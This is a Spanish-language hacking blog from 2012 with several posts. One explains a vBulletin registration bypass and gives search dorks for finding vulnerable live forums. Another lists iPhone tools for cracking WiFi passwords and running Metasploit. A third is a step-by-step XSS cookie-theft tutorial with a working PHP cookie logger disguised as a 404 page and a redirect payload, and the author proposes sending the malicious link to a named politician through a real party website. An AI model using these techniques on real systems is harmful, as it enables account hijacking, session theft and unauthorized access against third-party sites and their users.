jueves, 16 de febrero de 2012

vBulletin Registration Bypass Vulnerability

 

Hoy trabajaremos una vulnerabilidad en el famoso foro vBUllettin que afecta a las versiones 3.8.4 y 3.8.5 . La finalidad de esta vuln es registrarnos con el nombre que queramos, por ejemplo admin, y así poder ver los correos que recibe o poder mandarlos. Para buscar alguna web con la que practicar utilizaremos el siguiente dork:

"powered by vBulletin 3.8.4"

o también

"powered by vBulletin 3.8.5" 


Para comprobar si la web es vuln miraremos al final de ella:

 

Si pone ---> Powered by: vBulletin 3.8.4 o 3.8.5 podremos empezar a explotarla.

Primero nos vemos a la sección para registrarnos:

Ahora que ya estamos en el formulario de registro rellenamos todos los datos normal menos en usuario que pondremos el que queremos pero con &#00 al final (ej: ADMIN&#00)

Nos quedará así:

 

 

Le daremos a finalizar registro o registrarse y ya esta, así de simple ya estaremos registrados como admin (podemos hacerlo con el nombre que queramos!)

 

 


Si queréis mas info de la vuln aquí va exploit-db:

http://www.exploit-db.com/exploits/14833/ 

 

Salu2 anónimo! 

lunes, 6 de febrero de 2012

Hackeando con ipod/iphone!

Estuve pensando en reunir una serie de herramientas para el ipod o iphone (ya que el SO es practicamente el mismo) para analizar y explotar servidores y redes.

               

-Iwep pro (Sacar contraseñas wifi)(Cydia)
-zScan (Escanea un rango de ips por puerto y busca la   
        vulnerabilidad MS08-067)(installous)
-IP Scanner (Sacar los ordenadores en una red local)(installous)
-FtpCommand (Para conectar vía ftp)(installous)
-iPortScan (Escaneo un rango de puertos)(installous)
-Terminal (Cydia)
 -Metasploit (exploits) (desde el PC)
 -Nmap (escaneo avanzado de servers) (Cydia)

Por supuesto para tener todas estas herramientas es necesario tener Cydia, es de decir el ipod con jailbreak .

Desde installous podemos descargar scanners de ips y puertos, pero si queremos algo mas avanzado necesitamos un terminal para poder ejecutar Nmap y metasploit.

Desde cydia buscamos terminal. Y nos instalamos mobile terminal.
Si no nos aparece es porque al principio no seleccionamos la opción de hacker, para ponerlo vamos a manejar y en ajustes podemos seleccionar usuario, hacker o desarrollador, seleccionamos hacker.


Ahora que tenemos el mobile terminal ya podemos instalar metasploit:


             

  
Tutorial de matasploit en el ipod:


http://foro.elhacker.net/hacking_avanzado/manual_instalando_msf_en_el_iphone-t300030.0.html


Si no nos funciona es porque tenemos que poner la librería de ruby.


Para instalarla seguimos los mismos pasos que para instalar metasploit, tenéis que instalar dos archivos:


http://www.mediafire.com/?0z6j3i0tspx3pus


Para la instalación de Nmap es mas fácil. Buscamos en Cydia Nmap y le damos a instalar y ya lo tendremos listo en nuestro terminal.

También os aconsejo que os instaléis iWep, concretamente la versión pro. Es una aplicación para sacar las contraseñas de algunos routers vulnerables. Va perfecto. Yo en casi cualquier sitio puedo conectarme y en menos de un minuto.


link: http://www.hackstor.biz/2010/02/iwep-pro.html

                          


 
Otro día veremos como usar metasploit en el ipod con la vulnerabilidad MS08-067 y una vez conectados al router como cambiar la contraseña.



Salu2 anónimo

viernes, 3 de febrero de 2012

Archivo de páginas con XSS

En xssed.com podreis encontrar una inmensa lista de páginas con XSS, y así poder practicar lo publicado en los anteriores posts. Esto nos sirve a la hora de ralizar pen testing para encontrar alguna vulnerabilidad en el server, simplemente introduciendo su URL .

aquí la página:

http://www.xssed.com/archive/ 

jueves, 2 de febrero de 2012

Robando cookies con XSS 



Supongo que os acordareis del anterior post sobre ataque a la URL del server y lo probamos en la página del pp en castellón, aparte de para echarnos unas risas este ataque no tenia ningún tipo de peligro, de momento...

Lo que haremos en este tutorial será sacarle mas provecho a esta vuln y conseguir las cookies de los usuarios de la página, podremos ver cosas como su ip, la fecha y hora en la que entraron en la página vuln y sus cookies, LO MAS IMPORTANTE! 


Las cookies es por decirlo de alguna manera la información sobre el usuario que se queda guardada en su pc, y en ellas puede contener información de todo tipo, asta contraseñas.


Empezaremos por crear un servidor web. Esto parece muy complicado pero no lo es, simplemente accediendo a la web 000webhost y registrándonos obtendremos nuestro server, así de fácil.

Cuando ya lo tengamos todo, accederemos a nuestro server dándole a Go to Cpanel:

 

 Ahora le daremos a file manager:




Ingresamos nuestro pass y ya estaremos dentro.

Una vez dentro le daremos a la carpeta que pone public html


Y eliminamos todos los archivos que hay dentro (click en el check box y le damos a delete, como en el correo :)


Ahora creamos un nuevo archivo dándole a new file:








En New file name ponemos index.html y ponemos dentro el siguiente código:

<p><font face="Times New Roman"><strong><font size="7"> Error 404: page not found</font></strong></font></p>

<?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
?>




Lo que hace esto es mostrar un mensaje de error 404 pagina no encontrada y las cookies, la ip, la fecha y el sitio de procedencia, se quedan guardados dentro de log.txt 



log.txt se quedará guardado en la carpeta de public html y podremos consultarlo cuando queramos dandole a view.




El funcionamiento es simple, cuando la víctima se conecte al servidor del pp mediante la URL maliciosa, será redireccionado a nuestro server, y sus cookies se quedarán guardadas en log.txt


Código para redireccionar a una web:

<META HTTP-EQUIV="Refresh" CONTENT="3; URL=tu web">


Acordaros que para instertarlo teniamos que poner "> para salir del input!

La URL maliciosa quedaria así:


Ahora imaginad que se lo anviamos a nuestro querido amigo fabra jejeje :) y entra, se iria a amqh.net63.net y ya tendríamos las cookies en log.txt!


Bueno esto es solo un ejemplo pero si descubris algun XSS de inyección por la URL en un foro podria ser muy útil para sacar los usuarios del foro.


Acabo este post riendome un poco de las personas que creen que XSS es una vulnerabilidad de poco riesgo. PUES SE EQUIVOCAN!




Salu2 anónimo!

miércoles, 1 de febrero de 2012

Usando Fear the Foca online

Como primer dia del mes hoy os presento esta gran herramienta online creada por el equipo de informática 64, de momento usaremos su versión online ya que es bastante simple y fácil de usar (la otra version es descargable, mas avanzada, analiza las webs pero ya la veremos) , aqui va el link y ahora explicare en que consiste:

http://www.informatica64.com/foca/default.aspx 

Lo que hace foca es extraer los metadatos, las fechas y los usuarios de un fichero .doc .ppt .pps .xls .docx .pptx .ppsx .xlsx .sxw .sxc .sxi .odt .ods .odg .odp .pdf .wpd .svg .svgz o .jpg, vamos a verlo y lo entenderemos mejor:




Estamos en la web elhacker.net y en el apartado de manuales y textos, nos descargamos el .pdf que pone Remote File Inc.

Una vez descargado abrimos el foca online, le damos a examinar lo cargamos y le damos a analizar fichero.

Cuando termine en la parte de bajo tendremos una serie de info sobre el .pdf vamos a verla:
Como podeis observar podemos ver la aplicación con la que se ha echo, el usuario, su creación y su posterior modificación. 

Esto es muy útil para el analisis/pen-testing de web. Mas adelante veremos su versión free de descarga que nos ofrece muchisimas mas posibilidades.

Por el momento esto es todo. Si quereis para practicar podeis crear pdf o words y subirlos, en ningun momento el server se queda con el archivo.


Salu2 anónimo!